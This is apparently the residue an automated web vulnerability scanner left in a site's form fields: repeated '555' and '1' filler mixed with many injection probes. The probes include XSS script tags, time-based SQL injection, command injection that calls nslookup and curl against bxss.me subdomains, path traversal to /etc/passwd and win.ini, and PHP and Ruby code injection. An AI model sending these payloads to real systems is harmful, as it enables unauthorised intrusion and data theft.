Davi Lucas
Davi Lucas
555
1
555
1
555
1
555
1
555
xfs.bxss.me
555
'"
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
<!--
xfs.bxss.me
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
'"
1
555
1
555
1
<!--
1
555
1
555
1
555
1'"()&%<zzz><ScRiPt >i2pv(9791)</ScRiPt>
555
1
555
1
555
'"()&%<zzz><ScRiPt >i2pv(9870)</ScRiPt>
555
1
555
1
555
1
555
19223632
555
1
555
1
555
1
555'"()&%<zzz><ScRiPt >i2pv(9986)</ScRiPt>
1
555
1
555
555
1
555
1
555
1
555
1
555
response.write(9990033*9980785)
'"()&%<zzz><ScRiPt >i2pv(9309)</ScRiPt>
1
555
1
555
12345'"\'\");|]*{ <>?''????
555
1
5559004895
1
555
'+response.write(9990033*9980785)+'
555
1
555
1
555
1
555
"+response.write(9990033*9980785)+"
555
555
1
555
echo vukqah$()\ jvfzxj\nz^xyu||a #' &echo vukqah$()\ jvfzxj\nz^xyu||a #|" &echo vukqah$()\ jvfzxj\nz^xyu||a #
555
1
response.write(9084670*9938610)
1
555
&echo movirb$()\ sfijmt\nz^xyu||a #' &echo movirb$()\ sfijmt\nz^xyu||a #|" &echo movirb$()\ sfijmt\nz^xyu||a #
555
1
12345'"\'\");|]*{ <>?''????
1
'+response.write(9084670*9938610)+'
1
555
1
"+response.write(9084670*9938610)+"
1
555
1&echo vfuktc$()\ ykksxm\nz^xyu||a #' &echo vfuktc$()\ ykksxm\nz^xyu||a #|" &echo vfuktc$()\ ykksxm\nz^xyu||a #
555
1
555
tI4gUTCm
555
1
555
1
555
|echo bmcbxi$()\ swghfz\nz^xyu||a #' |echo bmcbxi$()\ swghfz\nz^xyu||a #|" |echo bmcbxi$()\ swghfz\nz^xyu||a #
555
1
555
1
555
1|echo kuoxjy$()\ hjafig\nz^xyu||a #' |echo kuoxjy$()\ hjafig\nz^xyu||a #|" |echo kuoxjy$()\ hjafig\nz^xyu||a #
555
1
555
1
555
SnVG5CPB: WroYZZnN
555
1
555
expr 9000673743 - 988368
555
1
555
1
555
1
2swgo6k2
1
555
1
555
1
555
(nslookup -q=cname hitqnphbgotpi01a77.bxss.me||curl hitqnphbgotpi01a77.bxss.me))
555
1
555
1
G8hAon6q: M6qpDYUP
1
555
1
555
$(nslookup -q=cname hitehmdsndycg7da46.bxss.me||curl hitehmdsndycg7da46.bxss.me)
555
1
555
1
555
1
555
1
555
1
555
&nslookup -q=cname hittufvtbdowjccefc.bxss.me&'\"`0&nslookup -q=cname hittufvtbdowjccefc.bxss.me&`'
555
../../../../../../../../../../../../../../etc/passwd
555
1
555
1
555
1
555
&(nslookup -q=cname hitsomaezpbdgafa82.bxss.me||curl hitsomaezpbdgafa82.bxss.me)&'\"`0&(nslookup -q=cname hitsomaezpbdgafa82.bxss.me||curl hitsomaezpbdgafa82.bxss.me)&`'
555
../../../../../../../../../../../../../../windows/win.ini
555
1
555
|(nslookup -q=cname hitufdygpkrtr13759.bxss.me||curl hitufdygpkrtr13759.bxss.me)
555
1
555
1
555
`(nslookup -q=cname hitmlktftbupp9793e.bxss.me||curl hitmlktftbupp9793e.bxss.me)`
555
file:///etc/passwd
555
1
555
1
555
1
555
;(nslookup -q=cname hitrqoisygljt1ae29.bxss.me||curl hitrqoisygljt1ae29.bxss.me)|(nslookup -q=cname hitrqoisygljt1ae29.bxss.me||curl hitrqoisygljt1ae29.bxss.me)&(nslookup -q=cname hitrqoisygljt1ae
555
1
555
1
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitbrtpvzdssufcff5.bxss.me||curl${IFS}hitbrtpvzdssufcff5.bxss.me)
555
1
555
../1
555
1
555
1
555
1
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitwacsmfkcvy96a30.bxss.me||curl${IFS}hitwacsmfkcvy96a30.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitwacsmfkcvy96a30.bxss.me||curl${IFS}h
555
1
echo ajdgym$()\ oobetv\nz^xyu||a #' &echo ajdgym$()\ oobetv\nz^xyu||a #|" &echo ajdgym$()\ oobetv\nz^xyu||a #
1
555
1
../../../../../../../../../../../../../../etc/passwd
1
&echo jkbqwq$()\ pvcmez\nz^xyu||a #' &echo jkbqwq$()\ pvcmez\nz^xyu||a #|" &echo jkbqwq$()\ pvcmez\nz^xyu||a #
1
555
1
555
1
555
1
../../../../../../../../../../../../../../windows/win.ini
1
555&echo wovgqp$()\ rshjbl\nz^xyu||a #' &echo wovgqp$()\ rshjbl\nz^xyu||a #|" &echo wovgqp$()\ rshjbl\nz^xyu||a #
1
555
1
file:///etc/passwd
1
555
1
555
1
|echo tixver$()\ vziwwh\nz^xyu||a #' |echo tixver$()\ vziwwh\nz^xyu||a #|" |echo tixver$()\ vziwwh\nz^xyu||a #
1
555
1
555
1
555
1
555
1
555
1
555|echo qvxovl$()\ jhwicf\nz^xyu||a #' |echo qvxovl$()\ jhwicf\nz^xyu||a #|" |echo qvxovl$()\ jhwicf\nz^xyu||a #
1
555
1
../555
1
555
1
555
1
expr 9000118918 - 962359
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
(nslookup -q=cname hitlvhkqagrsh41d87.bxss.me||curl hitlvhkqagrsh41d87.bxss.me))
1
555
1
555
1
555
1
555
1
$(nslookup -q=cname hitpzofamgwrra850b.bxss.me||curl hitpzofamgwrra850b.bxss.me)
1
555
1
555
1
555
1
555
1
&nslookup -q=cname hitbectqynyec489af.bxss.me&'\"`0&nslookup -q=cname hitbectqynyec489af.bxss.me&`'
1
555
1
555
1
555
1
555
1
&(nslookup -q=cname hitmttdvqrfpq19e89.bxss.me||curl hitmttdvqrfpq19e89.bxss.me)&'\"`0&(nslookup -q=cname hitmttdvqrfpq19e89.bxss.me||curl hitmttdvqrfpq19e89.bxss.me)&`'
1
555
1
555
1
555
1
555
1<esi:include src="http://bxss.me/rpb.png"/>
555
1
|(nslookup -q=cname hitfvvwixgrowfb053.bxss.me||curl hitfvvwixgrowfb053.bxss.me)
1
555
1
555<esi:include src="http://bxss.me/rpb.png"/>
1
555
1
`(nslookup -q=cname hitwvdkbtoryr7b854.bxss.me||curl hitwvdkbtoryr7b854.bxss.me)`
1
555
1
555
1
555
1
555
${9999756+9999675}
555
1
555
1
555
1
${10000268+10000164}
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
1
;(nslookup -q=cname hitthblpkajlh1d583.bxss.me||curl hitthblpkajlh1d583.bxss.me)|(nslookup -q=cname hitthblpkajlh1d583.bxss.me||curl hitthblpkajlh1d583.bxss.me)&(nslookup -q=cname hitthblpkajlh1d583.bxss.me||curl hitthblpkajlh1d583.bxss.me)
1
555
1
555
1
555
1
555
';print(md5(31337));$a='
|(nslookup${IFS}-q${IFS}cname${IFS}hitspvmupyrll0795c.bxss.me||curl${IFS}hitspvmupyrll0795c.bxss.me)
1
555
1
555
1
555
1
&(nslookup${IFS}-q${IFS}cname${IFS}hityzsafiazstbb1c5.bxss.me||curl${IFS}hityzsafiazstbb1c5.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hityzsafiazstbb1c5.bxss.me||curl${IFS}hityzsafiazstbb1c5.bxss.me)&`'
1
555
";print(md5(31337));$a="
555
1
555
'.gethostbyname(lc('hitko'.'ldrllign43de4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(88).chr(105).chr(72).'
555
1
555
1
555
1
555
1
555
".gethostbyname(lc("hitmm"."eoddmnsvd74e0.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(85).chr(118).chr(85)."
555
1
555
1
555
1
555
${@print(md5(31337))}
555
1
555
1
555
gethostbyname(lc('hitpf'.'muakvkpue546e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(65).chr(114).chr(69)
555
1
555
1
555
1
555
${@print(md5(31337))}\
555
1
'.gethostbyname(lc('hitzc'.'bmceyxsmda585.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(89).chr(107).chr(77).'
1
555
1
555
'.print(md5(31337)).'
555
1
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
1
555
1
555
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
555
1
".gethostbyname(lc("hitzj"."uvmnrerzf7a99.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(78).chr(117).chr(79)."
1
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
';print(md5(31337));$a='
1
555
1
555
1
555
/etc/shells
gethostbyname(lc('hitjo'.'ffxttsfi104a6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(66).chr(116).chr(80)
1
555
1
555
1
";print(md5(31337));$a="
1
555
1
555
1
555
../../../../../../../../../../../../../../etc/shells
555
1
555
1
555
HttP://bxss.me/t/xss.html?%00
555
1
555
1
${@print(md5(31337))}
1
555
bxss.me/t/xss.html?%00
555
c:/windows/win.ini
555
1
555
1
555
1
555
1
${@print(md5(31337))}\
1
555
bxss.me
555
1
555
1
555
1
555
1
555
1
'.print(md5(31337)).'
1
555
Http://bxss.me/t/fit.txt
555
1
HttP://bxss.me/t/xss.html?%00
1
555
1
555
1
555
1
555
http://bxss.me/t/fit.txt?.jpg
555
1
bxss.me/t/xss.html?%00
1
555
1
555
1
555
1
555
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1
555
1
555
1
555
1
555
1
555
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
/etc/shells
1
555
1
555
1
555
1
555
1
../../../../../../../../../../../../../../etc/shells
1
555
1
555
1
555
1
555
1
555
"+"A".concat(70-3).concat(22*4).concat(119).concat(89).concat(113).concat(76)+(require"socket" Socket.gethostbyname("hitck"+"gliuwuyj747b2.bxss.me.")[3].to_s)+&
555
1
c:/windows/win.ini
1
555
1
555
1
555
'+'A'.concat(70-3).concat(22*4).concat(106).concat(83).concat(97).concat(76)+(require'socket' Socket.gethostbyname('hitrn'+'jvxefyzv7f8f5.bxss.me.')[3].to_s)+
555
1
555
1
555
1
bxss.me
1
555
1
555
'A'.concat(70-3).concat(22*4).concat(115).concat(68).concat(108).concat(80)+(require'socket' Socket.gethostbyname('hitbq'+'adcpkxuk516ab.bxss.me.')[3].to_s)
555
1
Http://bxss.me/t/fit.txt
1
555
1
555
1
555
1
"+"A".concat(70-3).concat(22*4).concat(101).concat(77).concat(100).concat(81)+(require"socket" Socket.gethostbyname("hityb"+"eviqliyj3fcd7.bxss.me.")[3].to_s)+"
1
http://bxss.me/t/fit.txt?.jpg
1
555
1
'+'A'.concat(70-3).concat(22*4).concat(108).concat(87).concat(97).concat(71)+(require'socket' Socket.gethostbyname('hitqb'+'cockkbwd0b0d7.bxss.me.')[3].to_s)+'
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
'A'.concat(70-3).concat(22*4).concat(105).concat(77).concat(103).concat(90)+(require'socket' Socket.gethostbyname('hitpl'+'ypentcym10f0c.bxss.me.')[3].to_s)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
depoimentos
555
1
555
1
555
1
555
1
555
1
555
1
555
depoimentos
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
depoimentos/.
555
1
depoimentos
1
555
1
555
1
555
1
555
1
555
redirtest.acx
555
1
555
1
depoimentos
1
555
1
555
1
555
1
555
1
555
1
555
1
redirtest.acx
1
555
1
depoimentos/.
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1&n966634=v929730
555
1
555
1
555
1
555
1
555&n971032=v987520
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
)
555
1
555
1
555
1
555
1
555
1
555
1
555
!(()&&!|*|*|
555
1
555
1
555
1
555
1
555
1
555
555
^(#$!@#$)(()))******
555
1
555
1
555
1
)
1
555
1
555
1
!(()&&!|*|*|
1
555
1
555
1
555
555
1BRTLQIvs
^(#$!@#$)(()))******
1
555
555
1tVawRk4U
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
555
1
555
1
555
'"()
555
1
555
1
555
1
555
1'&&sleep(27*1000)*qfluso&&'
555
1
555
1
555
1"&&sleep(27*1000)*rbuhrp&&"
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
-1 OR 5*5=25 --
555
1'||sleep(27*1000)*txzegh||'
555
1
555
1
555
1
555
1
555
-1 OR 5*5=25
555
1
555
1
555
1"||sleep(27*1000)*heoxvb||"
555
1
555
-1' OR 5*5=25 --
555
1
555
1
555
1
555
-1 OR 5*5=25 --
555
1
555
1
555
1
555
-1 OR 5*5=25
555
1
555
-1" OR 5*5=25 --
555
1
555
1
555
-1' OR 5*5=25 --
555
1
555
1
555
1
555
-1" OR 5*5=25 --
555
1
555
-1' OR 5*5=25 or 'XK48YQp8'='
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
1
555
1
555
1
555
-1" OR 5*5=25 or "Ot9flqzY"="
'"()
1
555
-1' OR 5*5=25 or 'xfpu7O7A'='
555
1
555
1
555
1
555
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1
555'&&sleep(27*1000)*bvsgmz&&'
1
555
-1" OR 5*5=25 or "rf7bOGYJ"="
555
1
555
1
555
1
555"&&sleep(27*1000)*daqurq&&"
1
555
1
555
1
555
xfs.bxss.me
555
1
555
1
555
1
555'||sleep(27*1000)*dwwqaq||'
1
555
1
555
1
555
1
xfs.bxss.me
1
555"||sleep(27*1000)*mjmrwp||"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
'"
555
1
555
1
555
1
555
1
555
1
555
1
555
<!--
555
1
555
1
555
1
555
1
555
1
555
1
'"
1
555
1
555
1
555
1
555
1
<!--
1
555
1
555
1
555
1
555
1'"()&%<zzz><ScRiPt >FN3L(9925)</ScRiPt>
555
1
555
1
555
1
555
1
555
1
555
'"()&%<zzz><ScRiPt >FN3L(9169)</ScRiPt>
555
1
555
1
555
1
555
1
555
555
19410569
555
1
555
1
555
1
555'"()&%<zzz><ScRiPt >FN3L(9080)</ScRiPt>
1
555
1
555
12345'"\'\");|]*{ <>?''????
555
1
555
response.write(9502902*9775123)
555
1
555
1
555
1
'"()&%<zzz><ScRiPt >FN3L(9192)</ScRiPt>
1
555
1
555
'+response.write(9502902*9775123)+'
555
555
1
555
1
5559514684
1
555
"+response.write(9502902*9775123)+"
555
1
555
1
12345'"\'\");|]*{ <>?''????
1
555
1
response.write(9641522*9855446)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
'+response.write(9641522*9855446)+'
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
"+response.write(9641522*9855446)+"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
echo hnsiav$()\ pmmgrr\nz^xyu||a #' &echo hnsiav$()\ pmmgrr\nz^xyu||a #|" &echo hnsiav$()\ pmmgrr\nz^xyu||a #
555
1
555
nuoTj1d7
555
1
555
1
555
1
555
1
555
iH8GQ65X: SZblcSuq
555
1
555
1
555
1
555
1
555
&echo gukqdq$()\ dvhipz\nz^xyu||a #' &echo gukqdq$()\ dvhipz\nz^xyu||a #|" &echo gukqdq$()\ dvhipz\nz^xyu||a #
555
1
555
1
555
1
555
1
bLdCUrwr
1
555
1
555
1
555
1
555
1&echo qyaxfo$()\ szezya\nz^xyu||a #' &echo qyaxfo$()\ szezya\nz^xyu||a #|" &echo qyaxfo$()\ szezya\nz^xyu||a #
555
1
555
1
555
1
555
1
555
1
555
|echo pbvxxs$()\ eztayg\nz^xyu||a #' |echo pbvxxs$()\ eztayg\nz^xyu||a #|" |echo pbvxxs$()\ eztayg\nz^xyu||a #
9mWySkgm: 2eIpnoN1
1
555
1
555
1
555
1|echo yghibn$()\ uhnuwh\nz^xyu||a #' |echo yghibn$()\ uhnuwh\nz^xyu||a #|" |echo yghibn$()\ uhnuwh\nz^xyu||a #
555
1
555
1
555
1
555
expr 9000835248 - 915184
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
(nslookup -q=cname hitcmltdigoumbc0e8.bxss.me||curl hitcmltdigoumbc0e8.bxss.me))
555
1
555
1
555
1
555
1
555
1
555
$(nslookup -q=cname hitwgdfxpvstc2f48f.bxss.me||curl hitwgdfxpvstc2f48f.bxss.me)
555
1
555
1
555
1
555
1
555
1
555
1
555
&nslookup -q=cname hithlzeqcgzkyd882d.bxss.me&'\"`0&nslookup -q=cname hithlzeqcgzkyd882d.bxss.me&`'
555
1
555
1
555
1
555
1
555
1
555
&(nslookup -q=cname hitkizgpsjgzj91451.bxss.me||curl hitkizgpsjgzj91451.bxss.me)&'\"`0&(nslookup -q=cname hitkizgpsjgzj91451.bxss.me||curl hitkizgpsjgzj91451.bxss.me)&`'
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
|(nslookup -q=cname hitllwiztejqg0fb16.bxss.me||curl hitllwiztejqg0fb16.bxss.me)
555
1
555
1
555
`(nslookup -q=cname hitreywiezlvkf21f2.bxss.me||curl hitreywiezlvkf21f2.bxss.me)`
555
1
555
1
555
1
555
1
555
;(nslookup -q=cname hitytttvcpcjs86f8a.bxss.me||curl hitytttvcpcjs86f8a.bxss.me)|(nslookup -q=cname hitytttvcpcjs86f8a.bxss.me||curl hitytttvcpcjs86f8a.bxss.me)&(nslookup -q=cname hitytttvcpcjs86f
555
1
555
1
555
1
555
1
555
../../../../../../../../../../../../../../etc/passwd
555
1
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitzuaqkwtzie32f9a.bxss.me||curl${IFS}hitzuaqkwtzie32f9a.bxss.me)
555
1
555
1<esi:include src="http://bxss.me/rpb.png"/>
555
1
555
../../../../../../../../../../../../../../windows/win.ini
555
1
555
1
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitexykfyccyk50983.bxss.me||curl${IFS}hitexykfyccyk50983.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitexykfyccyk50983.bxss.me||curl${IFS}h
555
1
555<esi:include src="http://bxss.me/rpb.png"/>
1
555
1
555
1
555
1
echo djgamk$()\ iwzrpk\nz^xyu||a #' &echo djgamk$()\ iwzrpk\nz^xyu||a #|" &echo djgamk$()\ iwzrpk\nz^xyu||a #
1
555
1
555
1
555
1
555
1
555
1
555
file:///etc/passwd
555
1
555
1
&echo pbfqdq$()\ nprvxw\nz^xyu||a #' &echo pbfqdq$()\ nprvxw\nz^xyu||a #|" &echo pbfqdq$()\ nprvxw\nz^xyu||a #
1
555
1
555
1
555
1
555
1
555
1
555&echo xkanhk$()\ hlapma\nz^xyu||a #' &echo xkanhk$()\ hlapma\nz^xyu||a #|" &echo xkanhk$()\ hlapma\nz^xyu||a #
1
555
1
555
../1
555
1
555
1
555
1
../../../../../../../../../../../../../../etc/passwd
1
555
1
555
1
|echo tcyxmz$()\ vwisde\nz^xyu||a #' |echo tcyxmz$()\ vwisde\nz^xyu||a #|" |echo tcyxmz$()\ vwisde\nz^xyu||a #
1
../../../../../../../../../../../../../../windows/win.ini
1
555
1
555|echo smokte$()\ kqagrf\nz^xyu||a #' |echo smokte$()\ kqagrf\nz^xyu||a #|" |echo smokte$()\ kqagrf\nz^xyu||a #
1
555
1
555
1
555
1
555
1
expr 9000478529 - 914661
1
555
1
555
1
555
1
file:///etc/passwd
1
555
1
555
1
555
${9999628+9999028}
555
1
555
1
(nslookup -q=cname hitqibsrsssav41cf9.bxss.me||curl hitqibsrsssav41cf9.bxss.me))
1
555
1
${10000498+9999991}
1
555
1
../555
1
$(nslookup -q=cname hitrjgsskoleg77b3a.bxss.me||curl hitrjgsskoleg77b3a.bxss.me)
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
1
&nslookup -q=cname hituyptprxgmn60e1c.bxss.me&'\"`0&nslookup -q=cname hituyptprxgmn60e1c.bxss.me&`'
1
555
1
555
1
555
1
555
';print(md5(31337));$a='
555
1
&(nslookup -q=cname hitgwbvrclbfeb4d04.bxss.me||curl hitgwbvrclbfeb4d04.bxss.me)&'\"`0&(nslookup -q=cname hitgwbvrclbfeb4d04.bxss.me||curl hitgwbvrclbfeb4d04.bxss.me)&`'
1
555
1
555
1
555
1
555
1
555
1
555
1
|(nslookup -q=cname hitjnkrkpliil19095.bxss.me||curl hitjnkrkpliil19095.bxss.me)
1
555
";print(md5(31337));$a="
555
1
555
1
555
1
555
1
555
${@print(md5(31337))}
`(nslookup -q=cname hitcxjfkrjicw0afe7.bxss.me||curl hitcxjfkrjicw0afe7.bxss.me)`
1
555
1
555
1
555
1
555
1
555
1
555
${@print(md5(31337))}\
555
1
;(nslookup -q=cname hitnvriwlbllff5669.bxss.me||curl hitnvriwlbllff5669.bxss.me)|(nslookup -q=cname hitnvriwlbllff5669.bxss.me||curl hitnvriwlbllff5669.bxss.me)&(nslookup -q=cname hitnvriwlbllff5669.bxss.me||curl hitnvriwlbllff5669.bxss.me)
1
555
1
555
1
555
1
555
'.gethostbyname(lc('hitmn'.'mhposqty70fae.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(72).chr(106).chr(77).'
555
'.print(md5(31337)).'
|(nslookup${IFS}-q${IFS}cname${IFS}hitxxlirtgytnb24eb.bxss.me||curl${IFS}hitxxlirtgytnb24eb.bxss.me)
1
555
1
555
1
555
1
555
".gethostbyname(lc("hitgv"."qlzpruav320d5.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(73).chr(117).chr(87)."
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
1
555
HttP://bxss.me/t/xss.html?%00
555
1
&(nslookup${IFS}-q${IFS}cname${IFS}hititzozwljfm1ed00.bxss.me||curl${IFS}hititzozwljfm1ed00.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hititzozwljfm1ed00.bxss.me||curl${IFS}hititzozwljfm1ed00.bxss.me)&`'
1
555
gethostbyname(lc('hitcy'.'hozezjonb212c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(72).chr(98).chr(67)
';print(md5(31337));$a='
1
555
1
555
1
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
bxss.me/t/xss.html?%00
555
1
555
1
HttP://bxss.me/t/xss.html?%00
1
";print(md5(31337));$a="
1
555
1
'.gethostbyname(lc('hitrj'.'acqqjwtzed3da.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(66).chr(110).chr(87).'
1
555
/etc/shells
555
1
bxss.me/t/xss.html?%00
1
555
../../../../../../../../../../../../../../etc/shells
555
1
555
1
555
1
${@print(md5(31337))}
1
".gethostbyname(lc("hitao"."htdwxxja895c3.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(88).chr(105).chr(72)."
1
555
1
555
1
gethostbyname(lc('hitge'.'iebblhqhe7b59.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(70).chr(110).chr(68)
1
555
c:/windows/win.ini
${@print(md5(31337))}\
1
555
1
555
1
555
1
555
1
555
bxss.me
555
1
555
"+"A".concat(70-3).concat(22*4).concat(101).concat(82).concat(118).concat(90)+(require"socket" Socket.gethostbyname("hitkq"+"rjchyfrv9322e.bxss.me.")[3].to_s)+&
555
1
555
1
'.print(md5(31337)).'
1
555
Http://bxss.me/t/fit.txt
555
'+'A'.concat(70-3).concat(22*4).concat(115).concat(67).concat(119).concat(72)+(require'socket' Socket.gethostbyname('hitzw'+'iviaglxm8318a.bxss.me.')[3].to_s)+&
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
http://bxss.me/t/fit.txt?.jpg
555
'A'.concat(70-3).concat(22*4).concat(113).concat(88).concat(97).concat(71)+(require'socket' Socket.gethostbyname('hitqf'+'dnpkvzwfb854d.bxss.me.')[3].to_s)
555
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1
555
1
555
1
555
1
"+"A".concat(70-3).concat(22*4).concat(109).concat(88).concat(114).concat(76)+(require"socket" Socket.gethostbyname("hitne"+"oatdedvy202a9.bxss.me.")[3].to_s)+"
1
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
1
555
1
555
1
555
1
'+'A'.concat(70-3).concat(22*4).concat(112).concat(81).concat(121).concat(71)+(require'socket' Socket.gethostbyname('hitwd'+'njdatmbx684a5.bxss.me.')[3].to_s)+'
1
/etc/shells
1
555
1
555
1
555
1
555
1
'A'.concat(70-3).concat(22*4).concat(105).concat(87).concat(97).concat(72)+(require'socket' Socket.gethostbyname('hitcn'+'baojfqyta7fcd.bxss.me.')[3].to_s)
1
555
1
555
1
../../../../../../../../../../../../../../etc/shells
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
c:/windows/win.ini
1
555
1
555
1
555
1
555
1
555
1
555
1
bxss.me
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1*if(now()=sysdate(),sleep(15),0)
555
1
Http://bxss.me/t/fit.txt
1
555
1
555
1
555
1
555
1
555
1
555
1*if(now()=sysdate(),sleep(15),0)
http://bxss.me/t/fit.txt?.jpg
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
depoimentos
555
1
555
1
555
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
555
1
555
1
555
1
555
depoimentos
555
1
555
1
555
1
555
1
555
depoimentos/.
555
1
555
1
555
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
555
1
555
1
555
1
depoimentos
1
555
1
555
1
555
1
depoimentos
1
555
1
555
1
555
1
555
1
555
1
depoimentos/.
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
redirtest.acx
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
redirtest.acx
1
555
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
555
1
555
1
555
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1&n930213=v908661
555
1
555
1
555
1
555
1
555
1
555&n913049=v906964
1
555
1
555
1
555
)
555
1
555
1
555
1
555
1
555
!(()&&!|*|*|
555
1
555
1
555
1
555
1
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
^(#$!@#$)(()))******
555
1
555
1
555
1
555
1
555
1
)
1
555
1
555
1
555
1
!(()&&!|*|*|
1
555
555
1
555
1
^(#$!@#$)(()))******
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
555
1
555
1
555
1BBACK4IAL0
555
1
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
1
555
'"()
555
1
555
1
555
1
1Z8NYVY8M0
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1'&&sleep(27*1000)*kygwgo&&'
555
1
555
1
555
1
555
1
555
1
555
1
555
1"&&sleep(27*1000)*idfduu&&"
555
1
555
1
555
1
555
1
555
1
555
1'||sleep(27*1000)*sunrwo||'
555
1
555
1
555
1
555
1
555
1"||sleep(27*1000)*gaudfk||"
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1; waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
'"()
1
555
1
555
1
555'&&sleep(27*1000)*vdqyoi&&'
1
555
1
555
1
555
1-1; waitfor delay '0:0:15' --
555"&&sleep(27*1000)*fdapxn&&"
1
555
1
555
1
555
1
555
1
555
1
555'||sleep(27*1000)*yqenxy||'
1
555
1
555
1
555
1
555
1
555"||sleep(27*1000)*ieijvp||"
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1); waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1
555
1-1); waitfor delay '0:0:15' --
555
1
555
1
555
1
555
1
555
1
555
1
555
